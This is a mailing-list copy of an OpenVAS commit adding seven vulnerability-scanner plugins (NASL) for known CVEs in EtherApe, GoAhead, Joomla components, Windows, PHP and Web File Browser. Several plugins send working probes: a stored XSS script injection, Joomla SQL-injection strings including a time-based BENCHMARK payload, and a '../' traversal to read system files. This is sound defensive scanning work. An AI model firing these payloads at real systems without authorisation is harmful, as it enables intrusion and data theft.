[Openvas-commits] r12061 - trunk/openvas-plugins/scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Wed Nov 9 14:03:18 CET 2011


Author: antu123
Date: 2011-11-09 14:03:16 +0100 (Wed, 09 Nov 2011)
New Revision: 12061

Added:
   trunk/openvas-plugins/scripts/gb_etherape_rpc_call_parsing_dos_vuln.nasl
   trunk/openvas-plugins/scripts/gb_goahead_webserver_mult_stored_xss_vuln.nasl
   trunk/openvas-plugins/scripts/gb_joomla_mult_components_sql_inj_vuln.nasl
   trunk/openvas-plugins/scripts/gb_joomla_teams_sql_inj_vuln.nasl
   trunk/openvas-plugins/scripts/gb_ms_truetype_font_privilege_elevation_vuln.nasl
   trunk/openvas-plugins/scripts/gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl
   trunk/openvas-plugins/scripts/gb_webfilebrowser_file_download_vuln.nasl
Log:
Added new plugins

Added: trunk/openvas-plugins/scripts/gb_etherape_rpc_call_parsing_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_etherape_rpc_call_parsing_dos_vuln.nasl	2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_etherape_rpc_call_parsing_dos_vuln.nasl	2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,109 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_etherape_rpc_call_parsing_dos_vuln.nasl 17841 2011-11-09 17:22:20Z nov $
+#
+# EtherApe RPC Packet Processing Denial of Service Vulnerability
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802340);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2011-3369");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-08 17:22:20 +0530 (Tue, 08 Nov 2011)");
+  script_name("EtherApe RPC Packet Processing Denial of Service Vulnerability");
+  desc = "
+  Overview: This host is installed with EtherApe and is prone to denial of
+  service vulnerabilities.
+
+  Vulnerability Insight:
+  The flaw is due to an error in the add_conversation function in
+  'conversations.c' when processing specially crafted RPC packet.
+
+  Impact:
+  Successful exploitation allows remote attackers to cause a NULL pointer
+  dereference or cause a denial of service.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  EtherApe version prior to 0.9.12
+
+  Fix: Upgrade to EtherApe version 0.9.12 or later,
+  For updates refer, http://etherape.sourceforge.net/
+
+  References:
+  http://osvdb.org/show/osvdb/75609
+  http://secunia.com/advisories/45989
+  http://etherape.sourceforge.net/NEWS.html
+  http://www.openwall.com/lists/oss-security/2011/09/19/4
+  http://www.openwall.com/lists/oss-security/2011/09/22/1
+  http://sourceforge.net/tracker/?func=detail&aid=3309061&group_id=2712&atid=102712 ";
+
+  script_description(desc);
+  script_summary("Check for the version of EtherApe");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Denial of Service");
+  exit(0);
+}
+
+include("ssh_func.inc");
+include("version_func.inc");
+
+## Open the socket
+sock = ssh_login_or_reuse_connection();
+if(!sock){
+  exit(0);
+}
+
+## Confirm Linux, as SSH can be instslled on Windows as well
+result = ssh_cmd(socket:sock, cmd:"uname");
+if("Linux" >!< result){
+  exit(0);
+}
+
+etherapeName = find_file(file_name:"etherape", file_path:"/", useregex:TRUE,
+                         regexpar:"$", sock:sock);
+
+foreach binaryName (etherapeName)
+{
+  ## Get the EtherApe version from command
+  etherVer = get_bin_version(full_prog_name:chomp(binaryName), version_argv:"--version",
+                             ver_pattern:"GNOME EtherApe ([0-9.]+)", sock:sock);
+
+  if(etherVer[1])
+  {
+    ## Check for EtherApe Version less than 0.9.12
+    if(version_is_less(version:etherVer[1], test_version:"0.9.12"))
+    {
+      security_warning(0);
+      ssh_close_connection();
+      exit(0);
+    }
+  }
+}
+
+ssh_close_connection();

Added: trunk/openvas-plugins/scripts/gb_goahead_webserver_mult_stored_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_goahead_webserver_mult_stored_xss_vuln.nasl	2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_goahead_webserver_mult_stored_xss_vuln.nasl	2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,110 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_goahead_webserver_mult_stored_xss_vuln.nasl 18413 2011-11-08 16:16:16Z nov $
+#
+# GoAhead Webserver Multiple Stored Cross Site Scripting Vulnerabilities
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802270);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2011-4273");
+  script_bugtraq_id(50039);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"creation_date", value:"2011-11-08 16:16:16 +0530 (Tue, 08 Nov 2011)");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_name("GoAhead Webserver Multiple Stored Cross Site Scripting Vulnerabilities");
+  desc = "
+  Overview: This host is running GoAhead Webserver and is prone to multiple
+  stored cross site scripting vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are caused due to improper validation of user-supplied input
+  via the 'group' parameter to goform/AddGroup, related to addgroup.asp,
+  the 'url' parameter to goform/AddAccessLimit, related to addlimit.asp,
+  or the 'user' or 'group' parameter to goform/AddUser, related to adduser.asp
+
+  Impact:
+  Successful exploitation will allow remote attackers to insert arbitrary HTML
+  and script code, which will be executed in a user's browser session in the
+  context of an affected site.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  GoAhead Webserver version 2.18
+
+  Fix: No solution or patch is available as on 8th November, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.goahead.com/products/webserver/default.aspx
+
+  References:
+  http://osvdb.org/show/osvdb/76845
+  http://osvdb.org/show/osvdb/76846
+  http://osvdb.org/show/osvdb/76847
+  http://www.kb.cert.org/vuls/id/384427 ";
+
+  script_description(desc);
+  script_summary("Check if GoAhead Webserver is vulnerable to Cross-Site Scripting");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web Servers");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+
+## Check Port State
+if(!get_port_state(port)) {
+  exit(0);
+}
+
+## Check Banner And Confirm Application
+banner = get_http_banner(port:port);
+if("Server: GoAhead-Webs" >!< banner) {
+  exit(0);
+}
+
+## Stored XSS (Not a safe check)
+if(safe_checks()){
+  exit(0);
+}
+
+## Construct Attack Request
+req = http_post(port:port, item:"/goform/AddGroup/addgroup.asp",
+                data:"group=<script>alert(doucment.cookie)</script>" +
+                     "&privilege=4&method=1&enabled=on&ok=OK");
+## Try XSS Attack
+res = http_keepalive_send_recv(port:port, data:req);
+
+## Confirm exploit worked by checking the response
+if("<script>alert(doucment.cookie)</script>" >< res){
+  security_warning(port);
+}

Added: trunk/openvas-plugins/scripts/gb_joomla_mult_components_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_joomla_mult_components_sql_inj_vuln.nasl	2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_joomla_mult_components_sql_inj_vuln.nasl	2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,128 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_joomla_mult_components_sql_inj_vuln.nasl 17758 2011-11-09 15:10:29 nov $
+#
+# Joomla Multiple Components SQL Injection Vulnerabilities
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802196);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2010-4927", "CVE-2010-4928", "CVE-2010-4929", "CVE-2010-4937",
+                "CVE-2010-4945", "CVE-2010-4902", "CVE-2010-4865", "CVE-2010-4902");
+  script_bugtraq_id(43319, 33254, 43415, 42334, 42986, 43605,42986);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-03 15:42:01 +0200 (Thu, 03 Nov 2011)");
+  script_name("Joomla Multiple Components SQL Injection Vulnerabilities");
+  desc = "
+  Overview: This host is running Joomla with multiple components and is
+  prone to SQL injection vulnerabilities.
+
+  Vulnerability Insight:
+  For more information about vulnerability refer the references section.
+
+  Impact:
+  Successful exploitation will let attackers to manipulate SQL queries by
+  injecting arbitrary SQL code.
+
+  Impact Level: Application.
+
+  Affected Software/OS:
+  Joomla Joostina component
+  Joomla sgicatalog component
+  Joomla Amblog component version 1.0
+  Joomla Clantools Component version 1.2.3
+  Joomla CamelcityDB component version 2.2
+  Joomla Clantools Component version 1.2.3
+  Joomla Restaurant Guide component version 1.0.0
+  Joomla Aardvertiser Component versions 2.1 and 2.1.1
+
+  Fix: For solution or patch refer the refer section.
+  For updates refer, http://extensions.joomla.org/extensions/
+
+  References:
+  http://secunia.com/advisories/40932
+  http://secunia.com/advisories/41322
+  http://xforce.iss.net/xforce/xfdb/62151
+  http://www.exploit-db.com/exploits/14530/
+  http://www.exploit-db.com/exploits/14596/
+  http://www.exploit-db.com/exploits/14530/
+  http://www.exploit-db.com/exploits/15040/
+  http://www.exploit-db.com/exploits/15157/
+  http://www.exploit-db.com/exploits/14902/
+  http://packetstormsecurity.org/files/92305/joomlacamelcitydb2-sql.txt
+  http://packetstormsecurity.org/files/view/105704/joomlasgicatalog-sql.txt ";
+
+  script_description(desc);
+  script_summary("Check if Joomla components are vulnerable for SQL injection attack");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_dependencies("joomla_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP port
+joomlaPort = get_http_port(default:80);
+if(!joomlaPort){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:joomlaPort)){
+  exit(0);
+}
+
+## Get the dir from KB
+if(!joomlaDir = get_dir_from_kb(port:joomlaPort, app:"joomla")){
+  exit(0);
+}
+
+## Make list of vulnerable pages
+pages = make_list("/index.php?option=com_restaurantguide&view=country&id='&Itemid=69",
+                  "/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode='",
+                  "/index.php?option=com_amblog&task=editsave&articleid='",
+                  "/index.php?option=com_camelcitydb2&view=all&Itemid=15",
+                  "/index.php?option=com_jeguestbook&view=item_detail&d_itemid='",
+                  "/index.php?option=com_clantools&squad='",
+                  "'/index.php?option=com_sgicatalog&task=view&lang=en&id='",
+                  "/index.php?option=com_aardvertiser&amp;cat_name='x+AND+'1'='1&amp;task=view");
+
+foreach page (pages)
+{
+  if(http_vuln_check(port:joomlaPort, url: joomlaDir + page, pattern: "<b>" +
+                 "Warning</b>:  Invalid argument supplied for foreach\(\)") ||
+  (http_vuln_check(port:joomlaPort, url:joomlaDir + page, pattern:"You have an error in " +
+                        "your SQL syntax;")))
+  {
+    security_warning(joomlaPort);
+    exit(0);
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_joomla_teams_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_joomla_teams_sql_inj_vuln.nasl	2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_joomla_teams_sql_inj_vuln.nasl	2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,113 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_joomla_teams_sql_inj_vuln.nasl 17758 2011-11-09 13:10:29 nov $
+#
+# Joomla 'Teams' Component SQL Injection Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802189);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2010-4941");
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-09 13:02:45 +0530 (Wed, 09 Nov 2011)");
+  script_name("Joomla 'Teams' Component SQL Injection Vulnerability");
+  desc = "
+  Overview: This host is running Joomla with Teams component and is prone to
+  SQL injection vulnerability.
+
+  Vulnerability Insight:
+  Input passed via the 'PlayerID' parameter to 'index.php' is not properly
+  sanitised before being used in SQL queries.
+
+  Impact:
+  Successful exploitation will let attackers to manipulate SQL queries by
+  injecting arbitrary SQL code.
+
+  Impact Level: Application.
+
+  Affected Software/OS:
+  Joomla Team Component version 1_1028_100809_1711
+
+  Fix: No solution or patch is available as on 08th November, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://joomla-clantools.de/downloads/cat_view/34-komponenten.html
+
+  References:
+  http://secunia.com/advisories/40933
+  http://www.exploit-db.com/exploits/14598/
+  http://www.securityfocus.com/archive/1/archive/1/512974/100/0/threaded ";
+
+  script_description(desc);
+  script_summary("Check if Joomla Teams component is vulnerable for SQL Injection attack");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_dependencies("joomla_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP port
+joomlaPort = get_http_port(default:80);
+if(!joomlaPort){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:joomlaPort)){
+  exit(0);
+}
+
+## Get the dir from KB
+if(!joomlaDir = get_dir_from_kb(port:joomlaPort, app:"joomla")){
+  exit(0);
+}
+
+## Try an exploit
+filename = string(joomlaDir + "/index.php");
+host = get_host_name();
+postData = "FirstName=OpenVAS-SQL-Test&LastName=SecPod&Notes=sds&TeamNames" +
+           "[1]=on&UniformNumber[1]=1&Active=Y&cid[]=&PlayerID=-1 OR (SELECT" +
+           "(IF(0x41=0x41,BENCHMARK(99999999,NULL),NULL)))&option=com_teams&" +
+           "task=save&controller=player";
+
+## Construct post request
+sndReq = string("POST ", filename, " HTTP/1.1\r\n",
+                "Host: ", host, "\r\n",
+                "Content-Type: application/x-www-form-urlencoded\r\n",
+                "Content-Length: ", strlen(postData), "\r\n\r\n",
+                postData);
+rcvRes = http_keepalive_send_recv(port:joomlaPort, data:sndReq);
+
+## Confirm the exploit
+if("OpenVAS-SQL-Test" >< rcvRes && "SecPod" >< rcvRes){
+  security_hole(joomlaPort);
+}

Added: trunk/openvas-plugins/scripts/gb_ms_truetype_font_privilege_elevation_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ms_truetype_font_privilege_elevation_vuln.nasl	2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_ms_truetype_font_privilege_elevation_vuln.nasl	2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,109 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ms_truetype_font_privilege_elevation_vuln.nasl 18377 2011-11-07 16:44:35Z nov $
+#
+# Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802500);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2011-3402");
+  script_bugtraq_id(50462);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-07 16:44:35 +0530 (Mon, 07 Nov 2011)");
+  script_name("Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability");
+  desc = "
+  Overview:
+  The host is installed with Microsoft Windows operating system and is prone to
+  pivilege escalation vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to due to an error within the Win32k kernel-mode
+  driver when parsing TrueType fonts.
+
+  Impact:
+  Successful exploitation could allow attackers to execute arbitrary code with
+  kernel-level privileges. Failed exploit attempts may result in a
+  denial-of-service condition.
+
+  Impact Level: System
+
+  Affected Software/OS:
+  Microsoft Windows 7 Service Pack 1 and prior
+  Microsoft Windows XP Service Pack 3 and prior
+  Microsoft Windows Vista Service Pack 2 and prior
+  Microsoft Windows Server 2008 Service Pack 2 and prior
+  Microsoft Windows server 2003 Service Pack 2 and prior
+
+  Fix: Apply the workaround from below link,
+  http://support.microsoft.com/kb/2639658
+
+  References:
+  http://secunia.com/advisories/46724/
+  http://support.microsoft.com/kb/2639658
+  http://technet.microsoft.com/en-us/security/advisory/2639658 ";
+
+  script_description(desc);
+  script_summary("Check if t2embed.dll is accessible");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Windows");
+  script_dependencies("secpod_reg_enum.nasl");
+  script_require_ports(139, 445);
+  exit(0);
+}
+
+
+include("smb_nt.inc");
+include("secpod_reg.inc");
+include("secpod_smb_func.inc");
+
+## Check for OS
+if(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){
+  exit(0);
+}
+
+## Get System Path
+sysPath = smb_get_systemroot();
+if(!sysPath ){
+  exit(0);
+}
+
+dllPath = sysPath + "\system32\t2embed.dll";
+
+## Exit if file does not exist
+if(!dllPath){
+ exit(0);
+}
+
+share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:dllPath);
+file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:dllPath);
+
+## Check if file is accessible by checking its size
+dllSize = get_file_size(file:file, share:share);
+if(dllSize != NULL){
+  security_hole(0);
+}

Added: trunk/openvas-plugins/scripts/gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl	2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl	2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,98 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl 18420 2011-11-08 13:11:11Z nov $
+#
+# PHP 'is_a()' Function Remote Arbitrary Code Execution Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802504);
+  script_version("$Revision: $");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-08 13:11:11 +0530 (Tue, 08 Nov 2011)");
+  script_cve_id("CVE-2011-3379");
+  script_bugtraq_id(49754);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("PHP 'is_a()' Function Remote Arbitrary Code Execution Vulnerability (Windows)");
+  desc = "
+  Overview: This host is installed with PHP and is prone to remote arbitrary
+  code execution vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to error in 'is_a()' function. It receives strings as
+  first argument, which can lead to the '__autoload()' function being called
+  unexpectedly and do not properly verify input in their '__autoload()'
+  function, which leads to an unexpected attack vectors.
+
+  Impact:
+  Successful exploitation could allow remote attackers to execute arbitrary PHP
+  code by including arbitrary files from remote resources.
+
+  Impact Level: Application/System
+
+  Affected Software/OS:
+  PHP Version 5.3.7 and 5.3.8 on windows.
+
+  Fix: No solution or patch is available as on 8th November, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://php.net/downloads.php
+
+  Workaround:
+  Apply the workaround for PHP from below link,
+  http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/
+
+  *****
+  NOTE : Ignore this warning, if above workaround has been applied.
+  *****
+
+  References:
+  http://secunia.com/advisories/46107/
+  https://bugzilla.redhat.com/show_bug.cgi?id=741020
+  http://www.securityfocus.com/archive/1/519770/30/0/threaded
+  http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/ ";
+
+  script_description(desc);
+  script_summary("Check for the version of PHP");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("General");
+  script_dependencies("secpod_php_detect_win.nasl");
+  script_require_keys("PHP/Ver/win");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get version from KB
+phpVer = get_kb_item("PHP/Ver/win");
+
+if(phpVer != NULL)
+{
+  ##Check for PHP version
+  if(version_is_equal(version:phpVer, test_version:"5.3.7") ||
+     version_is_equal(version:phpVer, test_version:"5.3.8")){
+    security_hole(0);
+  }
+}

Added: trunk/openvas-plugins/scripts/gb_webfilebrowser_file_download_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_webfilebrowser_file_download_vuln.nasl	2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_webfilebrowser_file_download_vuln.nasl	2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,121 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_webfilebrowser_file_download_vuln.nasl 18358 2011-11-08 17:09:26Z nov $
+#
+# Web File Browser 'act' Parameter File Download Vulnerability
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802341);
+  script_version("$Revision: $");
+  script_bugtraq_id(50508);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-08 17:09:26 +0530 (Tue, 08 Nov 2011)");
+  script_name("Web File Browser 'act' Parameter File Download Vulnerability");
+  desc = "
+  Overview:
+  This host is running with Web File Browser and is prone to file download
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to input validation error in 'act' parameter in
+  'webFileBrowser.php', which allows attackers to download arbitrary files
+  via a '../'(dot dot) sequences.
+
+  Impact:
+  Successful exploitation could allow attackers to download and read arbitrary
+  files on the affected application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Web File Browser versions 0.4b14 and prior
+
+  Fix: No solution or patch is available as on 09th November, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://webfilebrowser.sourceforge.net/
+
+  References:
+  http://xforce.iss.net/xforce/xfdb/71131
+  http://www.exploit-db.com/exploits/18070/
+  http://www.securityfocus.com/bid/50508/exploit ";
+
+  script_description(desc);
+  script_summary("Check for file download vulnerability in Web File Browser");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+##
+## The script code starts here
+##
+
+include("http_func.inc");
+include("host_details.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+  exit(0);
+}
+
+foreach dir (make_list("/webFileBrowser", "/webfilebrowser", "/",  cgi_dirs()))
+{
+  ## Send and Receive the response
+  sndReq = http_get(item:string(dir, "/webFileBrowser.php"), port:port);
+  rcvRes = http_send_recv(port:port, data:sndReq);
+
+  ## Confirm application is  NetArt Media Car Portal
+  if("<title>Web File Browser" >< rcvRes)
+  {
+    ## traversal_files() function Returns Dictionary (i.e key value pair)
+    ## Get Content to be checked and file to be check
+    files = traversal_files();
+
+    foreach file (keys(files))
+    {
+      ## Construct directory traversal attack
+      url = string(dir, "/webFileBrowser.php?act=download&subdir=&sortby=name&file=",
+                           crap(data:"../",length:6*9),files[file],"%00");
+
+      ## Confirm exploit worked properly or not
+      if(http_vuln_check(port:port, url:url,pattern:file))
+      {
+        security_hole(port:port);
+        exit(0);
+      }
+    }
+  }
+}



More information about the Openvas-commits mailing list